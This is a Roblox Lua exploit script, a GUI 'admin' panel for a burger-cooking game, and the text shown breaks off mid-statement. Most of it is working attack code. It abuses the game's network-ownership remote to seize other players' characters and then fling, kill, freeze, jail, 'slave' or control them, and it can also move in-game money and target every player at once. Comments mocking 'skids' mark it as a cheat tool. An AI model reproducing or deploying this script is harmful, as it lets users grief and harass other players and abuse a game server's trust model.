credits.ZIndex = 5 credits.Font = Enum.Font.SourceSansLight credits.Text = "Made by Whoogivesashit. Harked remade?" credits.TextColor3 = Color3.fromRGB(255, 255, 255) credits.TextSize = 17.000 credits.TextWrapped = true queue.Name = "queue" queue.Parent = Main queue.BackgroundColor3 = Color3.fromRGB(255, 255, 255) queue.BackgroundTransparency = 1.000 queue.Position = UDim2.new(0.45778206, 0, 0.894135416, 0) queue.Size = UDim2.new(0, 141, 0, 34) queue.ZIndex = 5 queue.Font = Enum.Font.SourceSans queue.Text = "Remote Queue: 0" queue.TextColor3 = Color3.fromRGB(255, 0, 4) queue.TextSize = 20.000 queue.TextWrapped = true Frame.Parent = Main Frame.BackgroundColor3 = Color3.fromRGB(255, 173, 32) Frame.BackgroundTransparency = 0.700 Frame.BorderColor3 = Color3.fromRGB(27, 42, 53) Frame.BorderSizePixel = 0 Frame.Size = UDim2.new(0, 293, 0, 38) top.Name = "top" top.Parent = Frame top.BackgroundColor3 = Color3.fromRGB(255, 255, 255) top.BackgroundTransparency = 1.000 top.Position = UDim2.new(0.154639125, 0, 0.312280744, 0) top.Size = UDim2.new(0, 201, 0, 14) top.ZIndex = 5 top.Font = Enum.Font.SourceSansLight top.Text = "Cooked" top.TextColor3 = Color3.fromRGB(255, 255, 255) top.TextSize = 36.000 top.TextWrapped = true UIGradient.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(255, 255, 255)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(122, 122, 122))} UIGradient.Rotation = 90 UIGradient.Parent = Frame ScrollingFrame.Parent = Main ScrollingFrame.Active = true ScrollingFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ScrollingFrame.BackgroundTransparency = 1.000 ScrollingFrame.BorderSizePixel = 0 ScrollingFrame.Position = UDim2.new(0.00359461666, 0, 0.181261286, 0) ScrollingFrame.Size = UDim2.new(0, 291, 0, 224) ScrollingFrame.ZIndex = 3 ScrollingFrame.BottomImage = "rbxasset://textures/ui/Scroll/scroll-middle.png" ScrollingFrame.ScrollBarThickness = 6 ScrollingFrame.TopImage = "rbxasset://textures/ui/Scroll/scroll-middle.png" Bring.Name = "Bring" Bring.Parent = ScrollingFrame Bring.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Bring.BackgroundTransparency = 0.500 Bring.BorderSizePixel = 0 Bring.Position = UDim2.new(0.0351677425, 0, 0.00577557739, 0) Bring.Size = UDim2.new(0, 131, 0, 40) Bring.ZIndex = 3 Bring.Font = Enum.Font.SourceSansLight Bring.Text = "Bring" Bring.TextColor3 = Color3.fromRGB(255, 255, 255) Bring.TextSize = 23.000 UICorner.CornerRadius = UDim.new(0, 4) UICorner.Parent = Bring Control.Name = "Control" Control.Parent = ScrollingFrame Control.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Control.BackgroundTransparency = 0.500 Control.BorderSizePixel = 0 Control.Position = UDim2.new(0.0351677425, 0, 0.190713778, 0) Control.Size = UDim2.new(0, 131, 0, 40) Control.ZIndex = 3 Control.Font = Enum.Font.SourceSansLight Control.Text = "Control" Control.TextColor3 = Color3.fromRGB(255, 255, 255) Control.TextSize = 23.000 UICorner_2.CornerRadius = UDim.new(0, 4) UICorner_2.Parent = Control Fling.Name = "Fling" Fling.Parent = ScrollingFrame Fling.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Fling.BackgroundTransparency = 0.500 Fling.BorderSizePixel = 0 Fling.Position = UDim2.new(0.0351677425, 0, 0.130001664, 0) Fling.Size = UDim2.new(0, 131, 0, 40) Fling.ZIndex = 3 Fling.Font = Enum.Font.SourceSansLight Fling.Text = "Fling" Fling.TextColor3 = Color3.fromRGB(255, 255, 255) Fling.TextSize = 23.000 UICorner_3.CornerRadius = UDim.new(0, 4) UICorner_3.Parent = Fling Unfreeze.Name = "Unfreeze" Unfreeze.Parent = ScrollingFrame Unfreeze.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Unfreeze.BackgroundTransparency = 0.500 Unfreeze.BorderSizePixel = 0 Unfreeze.Position = UDim2.new(0.0454770215, 0, 0.107878998, 0) Unfreeze.Size = UDim2.new(0, 131, 0, 40) Unfreeze.ZIndex = 3 Unfreeze.Font = Enum.Font.SourceSansLight Unfreeze.Text = "UnFreeze" Unfreeze.TextColor3 = Color3.fromRGB(255, 255, 255) Unfreeze.TextSize = 23.000 UICorner_4.CornerRadius = UDim.new(0, 4) UICorner_4.Parent = Unfreeze Rocket.Name = "Rocket" Rocket.Parent = ScrollingFrame Rocket.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Rocket.BackgroundTransparency = 0.500 Rocket.BorderSizePixel = 0 Rocket.Position = UDim2.new(0.511755526, 0, 0.190713778, 0) Rocket.Size = UDim2.new(0, 131, 0, 40) Rocket.ZIndex = 3 Rocket.Font = Enum.Font.SourceSansLight Rocket.Text = "Rocket" Rocket.TextColor3 = Color3.fromRGB(255, 255, 255) Rocket.TextSize = 23.000 UICorner_5.CornerRadius = UDim.new(0, 4) UICorner_5.Parent = Rocket Spin.Name = "Spin" Spin.Parent = ScrollingFrame Spin.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Spin.BackgroundTransparency = 0.500 Spin.BorderSizePixel = 0 Spin.Position = UDim2.new(0.511755526, 0, 0.12868242, 0) Spin.Size = UDim2.new(0, 131, 0, 40) Spin.ZIndex = 3 Spin.Font = Enum.Font.SourceSansLight Spin.Text = "Spin" Spin.TextColor3 = Color3.fromRGB(255, 255, 255) Spin.TextSize = 23.000 UICorner_6.CornerRadius = UDim.new(0, 4) UICorner_6.Parent = Spin freeze.Name = "freeze" freeze.Parent = ScrollingFrame freeze.BackgroundColor3 = Color3.fromRGB(172, 172, 172) freeze.BackgroundTransparency = 0.500 freeze.BorderSizePixel = 0 freeze.Position = UDim2.new(0.511755526, 0, 0.0683011562, 0) freeze.Size = UDim2.new(0, 131, 0, 40) freeze.ZIndex = 3 freeze.Font = Enum.Font.SourceSansLight freeze.Text = "Freeze" freeze.TextColor3 = Color3.fromRGB(255, 255, 255) freeze.TextSize = 23.000 UICorner_7.CornerRadius = UDim.new(0, 4) UICorner_7.Parent = freeze Kill.Name = "Kill" Kill.Parent = ScrollingFrame Kill.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Kill.BackgroundTransparency = 0.500 Kill.BorderSizePixel = 0 Kill.Position = UDim2.new(0.511755526, 0, 0.00577557739, 0) Kill.Size = UDim2.new(0, 131, 0, 40) Kill.ZIndex = 3 Kill.Font = Enum.Font.SourceSansLight Kill.Text = "Kill" Kill.TextColor3 = Color3.fromRGB(255, 255, 255) Kill.TextSize = 23.000 UICorner_8.CornerRadius = UDim.new(0, 4) UICorner_8.Parent = Kill Speed.Name = "Speed" Speed.Parent = ScrollingFrame Speed.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Speed.BackgroundTransparency = 0.500 Speed.BorderSizePixel = 0 Speed.Position = UDim2.new(0.511755526, 0, 0.251920134, 0) Speed.Size = UDim2.new(0, 131, 0, 40) Speed.ZIndex = 3 Speed.Font = Enum.Font.SourceSansLight Speed.Text = "Speed" Speed.TextColor3 = Color3.fromRGB(255, 255, 255) Speed.TextSize = 23.000 UICorner_9.CornerRadius = UDim.new(0, 4) UICorner_9.Parent = Speed Jump.Name = "Jump" Jump.Parent = ScrollingFrame Jump.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Jump.BackgroundTransparency = 0.500 Jump.BorderSizePixel = 0 Jump.Position = UDim2.new(0.0340922885, 0, 0.251920134, 0) Jump.Size = UDim2.new(0, 131, 0, 40) Jump.ZIndex = 3 Jump.Font = Enum.Font.SourceSansLight Jump.Text = "Jump" Jump.TextColor3 = Color3.fromRGB(255, 255, 255) Jump.TextSize = 23.000 UICorner_10.CornerRadius = UDim.new(0, 4) UICorner_10.Parent = Jump Slave.Name = "Slave" Slave.Parent = ScrollingFrame Slave.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Slave.BackgroundTransparency = 0.500 Slave.BorderSizePixel = 0 Slave.Position = UDim2.new(0.0340922885, 0, 0.313126415, 0) Slave.Size = UDim2.new(0, 131, 0, 40) Slave.ZIndex = 3 Slave.Font = Enum.Font.SourceSansLight Slave.Text = "Slave" Slave.TextColor3 = Color3.fromRGB(255, 255, 255) Slave.TextSize = 23.000 UICorner_11.CornerRadius = UDim.new(0, 4) UICorner_11.Parent = Slave Jail.Name = "Jail" Jail.Parent = ScrollingFrame Jail.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Jail.BackgroundTransparency = 0.500 Jail.BorderSizePixel = 0 Jail.Position = UDim2.new(0.511755526, 0, 0.313126415, 0) Jail.Size = UDim2.new(0, 131, 0, 40) Jail.ZIndex = 3 Jail.Font = Enum.Font.SourceSansLight Jail.Text = "Jail" Jail.TextColor3 = Color3.fromRGB(255, 255, 255) Jail.TextSize = 23.000 UICorner_12.CornerRadius = UDim.new(0, 4) UICorner_12.Parent = Jail UIGridLayout.Parent = ScrollingFrame UIGridLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center UIGridLayout.SortOrder = Enum.SortOrder.LayoutOrder UIGridLayout.CellPadding = UDim2.new(0, 8, 0, 5) UIGridLayout.CellSize = UDim2.new(0, 137, 0, 40) Fix.Name = "Fix" Fix.Parent = ScrollingFrame Fix.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Fix.BackgroundTransparency = 0.500 Fix.BorderSizePixel = 0 Fix.Position = UDim2.new(0.0340922885, 0, 0.251920134, 0) Fix.Size = UDim2.new(0, 131, 0, 40) Fix.ZIndex = 3 Fix.Font = Enum.Font.SourceSansLight Fix.Text = "Fix" Fix.TextColor3 = Color3.fromRGB(255, 255, 255) Fix.TextSize = 23.000 UICorner_13.CornerRadius = UDim.new(0, 4) UICorner_13.Parent = Fix NetClaim.Name = "NetClaim" NetClaim.Parent = ScrollingFrame NetClaim.BackgroundColor3 = Color3.fromRGB(172, 172, 172) NetClaim.BackgroundTransparency = 0.500 NetClaim.BorderSizePixel = 0 NetClaim.Position = UDim2.new(0.0340922885, 0, 0.251920134, 0) NetClaim.Size = UDim2.new(0, 131, 0, 40) NetClaim.ZIndex = 3 NetClaim.Font = Enum.Font.SourceSansLight NetClaim.Text = "NetClaim" NetClaim.TextColor3 = Color3.fromRGB(255, 255, 255) NetClaim.TextSize = 23.000 UICorner_14.CornerRadius = UDim.new(0, 4) UICorner_14.Parent = NetClaim Tpvan.Name = "Tpvan" Tpvan.Parent = ScrollingFrame Tpvan.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Tpvan.BackgroundTransparency = 0.500 Tpvan.BorderSizePixel = 0 Tpvan.Position = UDim2.new(0, 0, 0.352697104, 0) Tpvan.Size = UDim2.new(0, 287, 0, 50) Tpvan.ZIndex = 3 Tpvan.Font = Enum.Font.SourceSansLight Tpvan.Text = "TPVan" Tpvan.TextColor3 = Color3.fromRGB(255, 255, 255) Tpvan.TextSize = 23.000 UICorner_15.CornerRadius = UDim.new(0, 4) UICorner_15.Parent = Tpvan Money.Name = "Money" Money.Parent = ScrollingFrame Money.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Money.BackgroundTransparency = 0.500 Money.BorderSizePixel = 0 Money.Position = UDim2.new(0, 0, 0.352697104, 0) Money.Size = UDim2.new(0, 287, 0, 50) Money.ZIndex = 3 Money.Font = Enum.Font.SourceSansLight Money.Text = "Money" Money.TextColor3 = Color3.fromRGB(255, 255, 255) Money.TextSize = 23.000 UICorner_16.CornerRadius = UDim.new(0, 4) UICorner_16.Parent = Money NoCLip.Name = "NoCLip" NoCLip.Parent = ScrollingFrame NoCLip.BackgroundColor3 = Color3.fromRGB(172, 172, 172) NoCLip.BackgroundTransparency = 0.500 NoCLip.BorderSizePixel = 0 NoCLip.Position = UDim2.new(0, 0, 0.352697104, 0) NoCLip.Size = UDim2.new(0, 287, 0, 50) NoCLip.ZIndex = 3 NoCLip.Font = Enum.Font.SourceSansLight NoCLip.Text = "NoClip" NoCLip.TextColor3 = Color3.fromRGB(255, 255, 255) NoCLip.TextSize = 23.000 UICorner_17.CornerRadius = UDim.new(0, 4) UICorner_17.Parent = NoCLip Clear.Name = "Clear" Clear.Parent = ScrollingFrame Clear.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Clear.BackgroundTransparency = 0.500 Clear.BorderSizePixel = 0 Clear.Position = UDim2.new(0.0351677425, 0, 0.190713778, 0) Clear.Size = UDim2.new(0, 131, 0, 40) Clear.ZIndex = 3 Clear.Font = Enum.Font.SourceSansLight Clear.Text = "Clear" Clear.TextColor3 = Color3.fromRGB(255, 255, 255) Clear.TextSize = 23.000 UICorner_18.CornerRadius = UDim.new(0, 4) UICorner_18.Parent = Clear Orbit.Name = "Orbit" Orbit.Parent = ScrollingFrame Orbit.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Orbit.BackgroundTransparency = 0.500 Orbit.BorderSizePixel = 0 Orbit.Position = UDim2.new(0.0351677425, 0, 0.190713778, 0) Orbit.Size = UDim2.new(0, 131, 0, 40) Orbit.ZIndex = 3 Orbit.Font = Enum.Font.SourceSansLight Orbit.Text = "Orbit" Orbit.TextColor3 = Color3.fromRGB(255, 255, 255) Orbit.TextSize = 23.000 UICorner_19.CornerRadius = UDim.new(0, 4) UICorner_19.Parent = Orbit Goto.Name = "Goto" Goto.Parent = ScrollingFrame Goto.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Goto.BackgroundTransparency = 0.500 Goto.BorderSizePixel = 0 Goto.Position = UDim2.new(0.0351677425, 0, 0.190713778, 0) Goto.Size = UDim2.new(0, 131, 0, 40) Goto.ZIndex = 3 Goto.Font = Enum.Font.SourceSansLight Goto.Text = "Goto" Goto.TextColor3 = Color3.fromRGB(255, 255, 255) Goto.TextSize = 23.000 UICorner_20.CornerRadius = UDim.new(0, 4) UICorner_20.Parent = Goto target.Name = "target" target.Parent = Main target.BackgroundColor3 = Color3.fromRGB(172, 172, 172) target.BackgroundTransparency = 0.400 target.Position = UDim2.new(0.0255349874, 0, 0.800595582, 0) target.Size = UDim2.new(0, 278, 0, 33) target.Font = Enum.Font.SourceSans target.PlaceholderText = "Player Name" target.Text = "" target.TextColor3 = Color3.fromRGB(255, 255, 255) target.TextSize = 23.000 UICorner_21.CornerRadius = UDim.new(0, 4) UICorner_21.Parent = target UIGradient_2.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(255, 255, 255)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(122, 122, 122))} UIGradient_2.Rotation = 90 UIGradient_2.Parent = Main Refresh.Name = "Refresh" Refresh.Parent = Main Refresh.BackgroundColor3 = Color3.fromRGB(172, 172, 172) Refresh.BackgroundTransparency = 0.500 Refresh.Position = UDim2.new(0.0255350601, 0, 0.899736166, 0) Refresh.Size = UDim2.new(0, 127, 0, 30) Refresh.Font = Enum.Font.SourceSansLight Refresh.Text = "Respawn" Refresh.TextColor3 = Color3.fromRGB(255, 255, 255) Refresh.TextSize = 26.000 Refresh.TextWrapped = true UICorner_22.CornerRadius = UDim.new(0, 4) UICorner_22.Parent = Refresh search.Name = "search" search.Parent = Main search.BackgroundColor3 = Color3.fromRGB(172, 172, 172) search.BackgroundTransparency = 0.400 search.Position = UDim2.new(0.0255349874, 0, 0.708587348, 0) search.Size = UDim2.new(0, 278, 0, 33) search.Font = Enum.Font.SourceSans search.PlaceholderText = "Search commands" search.Text = "" search.TextColor3 = Color3.fromRGB(255, 255, 255) search.TextSize = 23.000 UICorner_23.CornerRadius = UDim.new(0, 4) UICorner_23.Parent = search local UserInputService = game:GetService("UserInputService") local dragging,dragInput,dragStart,startPos local RemoteQueue = (0) local function UpdatePos(input) local delta = input.Position - dragStart Main.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y) end Frame.InputBegan:Connect(function(input) if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then dragging =true dragStart =input.Position startPos =Main.Position input.Changed:Connect(function() if( input.UserInputState == (Enum.UserInputState.End)) then dragging = false end end) end end) Frame.InputChanged:Connect(function(input) if (input.UserInputType == (Enum.UserInputType.MouseMovement) or input.UserInputType == (Enum.UserInputType.Touch)) then dragInput = input end end) UserInputService.InputChanged:Connect(function(input) if (input == dragInput and dragging) then UpdatePos(input) end end) local function nocfang(c) return CFrame.new((c.x), (c.y), (c.z)) end local function clerp(p1, p2, percent) -- idk who made this but thanks to whoever made this! local p1x, p1y, p1z, p1R00, p1R01, p1R02, p1R10, p1R11, p1R12, p1R20, p1R21, p1R22 = p1:components() local p2x, p2y, p2z, p2R00, p2R01, p2R02, p2R10, p2R11, p2R12, p2R20, p2R21, p2R22 = p2:components() return CFrame.new(((p1x) + (percent)) * ((p2x) - (p1x)), ((p1y) + (percent) * ((p2y) - (p1y))), p1z + percent * (p2z - p1z), p1R00 + percent * (p2R00 - p1R00), p1R01 + percent * (p2R01 - p1R01), p1R02 + percent * (p2R02 - p1R02), p1R10 + percent * (p2R10 - p1R10), p1R11 + percent * (p2R11 - p1R11), p1R12 + percent * (p2R12 - p1R12), p1R20 + percent * (p2R20 - p1R20), p1R21 + percent * (p2R21 - p1R21), p1R22 + percent * (p2R22 - p1R22)) end local OrbDis = (4.3) local Orbs = ({}) local Remote = game:GetService("ReplicatedStorage").Events.Network.SetNetworkOwnership local lp = game:GetService("Players").LocalPlayer --game:GetService("ReplicatedStorage").Events.Player.KC:FireServer() -- Get 100 local UserInputService = game:GetService("UserInputService") function getPlayer(Player) local function findPlayer(stringg) if (stringg == ("me")) then return lp else for _, v in pairs(game:GetService("Players"):GetPlayers()) do if (stringg:lower() == (v.Name:lower()):sub(1, #stringg)) then return v end end end end return findPlayer(Player) end local function DoCommand(Command) spawn(function() RemoteQueue = (RemoteQueue+1) queue.Text = (("Remote Queue: ")..(RemoteQueue)) if (string.sub((Command),(1),#(".bring")) == (".bring")) then for i = 1,3 do pcall(function() local player = getPlayer(string.sub((Command),#".bring" + 2)) if (((player) ~= nil) and ((player.Character)~= nil)) then if ((player.Character:FindFirstChildOfClass("Part")) ~= nil) then for i = 1,20 do for _, Part in pairs(player.Character:GetDescendants()) do if (Part:IsA("BasePart")) then Remote:FireServer((Part),(lp)) Part.CFrame = lp.Character.HumanoidRootPart.CFrame end end end end end end) end elseif (string.sub((Command),(1),#(".goto")) == (".goto")) then for i = 1,3 do pcall(function() local player = getPlayer(string.sub((Command),#".goto" + 2)) if (((player) ~= nil) and ((player.Character)~= nil)) then if ((player.Character:FindFirstChildOfClass("Part")) ~= nil) then for _, Part in pairs(lp.Character:GetDescendants()) do if (Part:IsA("BasePart")) then Part.CFrame = player.Character.HumanoidRootPart.CFrame end end end end end) end elseif (string.sub(Command,1,#(".fix")) == (".fix") or string.sub(Command,1,#(".uncontrol")) == (".uncontrol")) then game:GetService('TeleportService'):TeleportToPlaceInstance(game.PlaceId, game.JobId, lp) elseif (string.sub(Command,1,#".cmds") == ".cmds") then game:GetService("StarterGui"):SetCore("SendNotification", {Title = ("Cook burgers admin");Text = ("The commands are listed in the console! \n Press F9 to view");}) elseif (string.sub(Command,1,#".netclaim") == ".netclaim") then for i = 1,3 do pcall(function() for _,player in pairs(game:GetService("Players"):GetPlayers()) do if (player ~= nil and player.Character ~= nil) then if (player.Character:FindFirstChildOfClass("Part") ~= nil) then for i = 1,20 do for _, Part in pairs(player.Character:GetDescendants()) do if (Part:IsA("BasePart")) then Remote:FireServer(Part,lp) end end end end end end end) end elseif (string.sub(Command,1,#".tpvan") == ".tpvan") then pcall(function() local Items = game:GetService("Workspace").Truck:GetDescendants() for _, item in pairs(Items) do if not item:IsA("ParticleEmitter") and item.ClassName:find("Part") or item.ClassName:find("Union") then Remote:FireServer(item,game:GetService("Players").LocalPlayer) item.CFrame = lp.Character.HumanoidRootPart.CFrame end end end) elseif (string.sub(Command,1,#".speed") == ".speed") then local player = getPlayer(string.sub(Command,#".speed" + 2)) pcall(function() if (player ~= nil and player.Character ~= nil) then if (player.Character:FindFirstChildOfClass("Part") ~= nil) then for _, Part in pairs(player.Character:GetDescendants()) do if (Part:IsA("BasePart")) then Remote:FireServer(Part,lp) end end player.Character:FindFirstChildOfClass('Humanoid').WalkSpeed = (100) end end end) elseif (string.sub(Command,1,#".jump") == ".jump") then local player = getPlayer(string.sub(Command,#".jump" + 2)) pcall(function() if (player ~= nil and player.Character ~= nil) then if (player.Character:FindFirstChildOfClass("Part") ~= nil) then for _, Part in pairs(player.Character:GetDescendants()) do if (Part:IsA("BasePart")) then Remote:FireServer(Part,lp) end end player.Character:FindFirstChildOfClass('Humanoid').JumpHeight =(100) player.Character:FindFirstChildOfClass('Humanoid').JumpPower =(100) end end end) elseif (string.sub(Command,1,#".freeze") == ".freeze") then local player = getPlayer(string.sub(Command,#".freeze" + 2)) pcall(function() if (player ~= nil and player.Character ~= nil) then if (player.Character:FindFirstChildOfClass("Part") ~= nil) then for i = 1,20 do for _, Part in pairs(player.Character:GetDescendants()) do if (Part:IsA("BasePart")) then Remote:FireServer(Part,lp) end end player.Character.HumanoidRootPart.Anchored = (true) end end end end) elseif (string.sub(Command,1,#".unfreeze") == ".unfreeze") then local player = getPlayer(string.sub(Command,#".unfreeze" + 2)) pcall(function() if (player ~= nil and player.Character ~= nil) then if (player.Character:FindFirstChildOfClass("Part") ~= nil) then for i = 1,20 do for _, Part in pairs(player.Character:GetDescendants()) do if (Part:IsA("BasePart")) then Remote:FireServer(Part,lp) end end player.Character.HumanoidRootPart.Anchored = (false) end end end end) elseif (string.sub(Command,1,#".rocket") == ".rocket") then local player = getPlayer(string.sub(Command,#".rocket" + 2)) pcall(function() if ((player ~= nil) and (player.Character ~= nil)) then for _, Part in pairs(player.Character:GetDescendants()) do if (player.Character:FindFirstChildOfClass("Part") ~= nil) then if (Part:IsA("BasePart")) then Remote:FireServer(Part,lp) Instance.new("BodyVelocity",Part).Velocity = Vector3.new(0,1000,0) Part.Velocity = Vector3.new(0,1000,0) end end end game:GetService("RunService").Stepped:Connect(function() if ((player ~= (nil)) and (player.Character ~= (nil))) then for _, child in pairs(player.Character:GetDescendants()) do if (child:IsA("BasePart") and child.CanCollide == true) then child.CanCollide = false end end else return end end) end end) elseif (string.sub(Command,1,#".fling") == ".fling") then -- ayo skid watcha lookin for? local player = getPlayer(string.sub(Command,#".fling" + 2)) pcall(function() if (player ~= nil and player.Character ~= nil) then if (player.Character:FindFirstChildOfClass("Part") ~= nil) then local xran local zran repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555 repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555 for _, Part in pairs(player.Character:GetDescendants()) do if (Part:IsA("BasePart")) then Remote:FireServer(Part,lp) end end game:GetService("RunService").Stepped:Connect(function() if ((player ~= nil) and (player.Character ~= nil)) then for _, child in pairs(player.Character:GetDescendants()) do if (child:IsA("BasePart") and child.CanCollide == true) then child.CanCollide = false end end else return end end) player.Character.Humanoid.Sit = true player.Character.HumanoidRootPart.Velocity = Vector3.new(0,0,0) local BodyForce = Instance.new("BodyForce", player.Character.HumanoidRootPart) BodyForce.force = Vector3.new(xran*4,9999*5,xran*4) end end end) elseif (string.sub(Command,1,#".kill") == ".kill") then local player = getPlayer(string.sub(Command,#".bring" + 2)) pcall(function() if (player ~= nil and player.Character ~= nil) then if (player.Character:FindFirstChildOfClass("Part") ~= nil) then for _, Part in pairs(player.Character:GetDescendants()) do if (Part:IsA("BasePart")) then Remote:FireServer(Part,lp) Part.Position = Vector3.new(3208.08, 360.516, 265.241) end end end end end) elseif (string.sub(Command,1,#".money") == ".money") then pcall(function() for _, Part in pairs(game:GetService("Workspace"):GetDescendants()) do if (Part:IsA("BasePart") and Part.Name == "Money") then pcall(function() Remote:FireServer(Part,lp) Part.CFrame = game:GetService("Workspace").Gameplay.CashRegister.RegisterPart.CFrame Part.Anchored = true end) end end end) elseif (string.sub(Command,1,#".noclip") == ".noclip") then -- say hi to the gerbils local player = getPlayer(string.sub(Command,#".noclip" + 2)) pcall(function() if ((player ~= nil) and (player.Character ~= nil) and (player.Name ~= lp.Name)) then spawn(function() if (player.Character:FindFirstChildOfClass("Part") ~= nil) then for _, Part in pairs(player.Character:GetDescendants()) do if (Part:IsA("BasePart")) then Remote:FireServer(Part,lp) end end game:GetService("RunService").Stepped:Connect(function() for _, child in pairs(player.Character:GetDescendants()) do if (child:IsA("BasePart") and (child.CanCollide == true)) then child.CanCollide = false end end end) end end) end end) elseif (string.sub(Command,1,#".slave") == ".slave") then -- stop bein a skid lmfao local player = getPlayer(string.sub(Command,#".slave" + 2)) pcall(function() if ((player ~= nil) and (player.Character ~= nil) and (player.Name ~= (lp.Name))) then spawn(function() if (player.Character:FindFirstChildOfClass("Part") ~= nil) then for _, Part in pairs(player.Character:GetDescendants()) do if (Part:IsA("BasePart")) then Remote:FireServer(Part,lp) end end game:GetService("RunService").Stepped:Connect(function() for _, child in pairs(player.Character:GetDescendants()) do if (child:IsA("BasePart") and child.CanCollide == true) then child.CanCollide = false end end end) repeat player.Character:FindFirstChildOfClass('Humanoid').WalkToPoint = (lp.Character.HumanoidRootPart.Position) wait(.1) wait() until ((player.Character.HumanoidRootPart.Position - lp.Character.HumanoidRootPart.Position).Magnitude < 5) end end) end end) elseif (string.sub(Command,1,#".jail") == ".jail") then -- stop bein a skid lmfao local player = getPlayer(string.sub(Command,#".jail" + 2)) pcall(function() if (player ~= nil and player.Character ~= nil) then if (player.Character:FindFirstChildOfClass("Part") ~= nil) then for _, Part in pairs(player.Character:GetDescendants()) do if (Part:IsA("BasePart")) then Remote:FireServer(Part,lp) Instance.new("BodyVelocity",Part).Velocity = Vector3.new(0,0,0) Instance.new("BodyVelocity",Part).Velocity = Vector3.new(0,0,0) Instance.new("BodyVelocity",Part).Velocity = Vector3.new(0,0,0) Part.Velocity = Vector3.new(0,0,0) end end player.Character:FindFirstChildOfClass("Humanoid").Jump = true end end end) elseif (string.sub(Command,1,#".orbit") == ".orbit") then -- stop bein a skid lmfao local player = getPlayer(string.sub(Command,#".orbit" + 2)) pcall(function() if (player ~= nil and player.Character ~= nil) then if (player.Character:FindFirstChildOfClass("Part") ~= nil) then for _, Part in pairs(player.Character:GetDescendants()) do if (Part:IsA("BasePart")) then Remote:FireServer(Part,lp) end end table.insert(Orbs, player.Character.HumanoidRootPart) end end end) elseif (string.sub(Command,1,#(".spin")) == (".spin")) then -- stop bein a skid lmfao local player = getPlayer(string.sub(Command,#".spin" + 2)) pcall(function() if (player ~= nil and player.Character ~= nil) then if (player.Character:FindFirstChildOfClass("Part") ~= nil) then for _, Part in pairs(player.Character:GetDescendants()) do if (Part:IsA("BasePart")) then Remote:FireServer(Part,lp) local bambam = Instance.new("BodyThrust",Part) bambam.Force = Vector3.new(101,0,101) bambam.Location = Part.Position lp.Chatted:connect(function(Msg) if (Msg == (string.sub(Msg,1,#(".unspin")))== (".unspin")) then bambam:Destroy() end end) end end end end end) elseif (string.sub(Command,1,#(".control")) == (".control")) then local Player2 = getPlayer(string.sub(Command,#".control" + 2)) for _, Part in pairs(Player2.Character:GetDescendants()) do for i = 1,20 do if (Part:IsA("BasePart")) then Remote:FireServer(Part,lp) end end end lp.Character = Player2.Character game:GetService("Workspace").CurrentCamera.CameraSubject = Player2.Character Player2.Character.Animate.Disabled = true wait(0.1) Player2.Character.Animate.Disabled = false elseif (string.sub(Command,(1),#(".clear")) == (".clear")) then for i = 1,10 do pcall(function() for _, Part in pairs(game:GetService("Workspace").Items:GetDescendants()) do if (Part:IsA("BasePart")) then Remote:FireServer(Part,lp) Instance.new("BodyVelocity",Part).Velocity = Vector3.new(0,-50,0) Part.Velocity = Vector3.new(0,-50,0) Part.Position = Vector3.new(3208.08, 360.516, 265.241) end end end) end end RemoteQueue = (RemoteQueue-1) end) end local Sound = Instance.new(("Sound"),(workspace)) Sound.SoundId = ("rbxassetid://1053296915") Sound:Play() game:GetService("StarterGui"):SetCore("SendNotification", {Title = ("Cook burgers admin v2");Text = ("Thanks for using made by Whoogivesashit#2751");}) lp.Chatted:connect(function(Msg) -- haha chat go brrrrr DoCommand(Msg:lower()) wait(.1) DoCommand(Msg:lower()) -- Idk wait() end) Refresh.Activated:connect(function() game:GetService("ReplicatedStorage").Events.Player.SpawnRequestEvent:FireServer() end) search:GetPropertyChangedSignal("Text"):connect(function() for _,v in pairs(ScrollingFrame:GetChildren()) do if v.Name:lower():match(search.Text:lower()) then v.Visible = true else v.Visible = false end end end) spawn(function() game:GetService("RunService").Heartbeat:Connect(function() local cf = CFrame.new() pcall(function() cf = lp.Character.HumanoidRootPart.CFrame end) cf = CFrame.new(cf.X, cf.Y, cf.Z) for i = 1, #Orbs do pcall(function() Remote:FireServer(Orbs[i],lp) Orbs[i].CFrame = clerp(Orbs[i].CFrame,cf * CFrame.Angles(0, (math.rad(i / #Orbs * 360)) + (time() / 10), 0) * CFrame.new(0, 0, OrbDis) * CFrame.Angles(-time() / 10, -time() / 10, -time() / 10), .1) end) end end) end) spawn(function() for _,button in pairs(ScrollingFrame:GetChildren()) do if button:IsA("UIGridLayout") == false then button.Activated:connect(function() if target.Text:lower() == "all" or target.Text:lower() == "everyone" then for _,v in pairs(game:GetService("Players"):GetPlayers()) do pcall(function() if v ~= nil and v.Character ~= nil then DoCommand('.'..button.Name:lower()..' '..v.Name) end end) end elseif target.Text:lower() == "others" then for _,v in pairs(game:GetService("Players"):GetPlayers()) do pcall(function() if v ~= nil and v.Character ~= nil and v.Name ~= lp.Name then DoCommand('.'..button.Name:lower()..' '..v.Name) end end) end elseif target.Text:lower() ~= "all" and target.Text:lower() ~= "everyone" and target.Text:lower() ~= "others" then 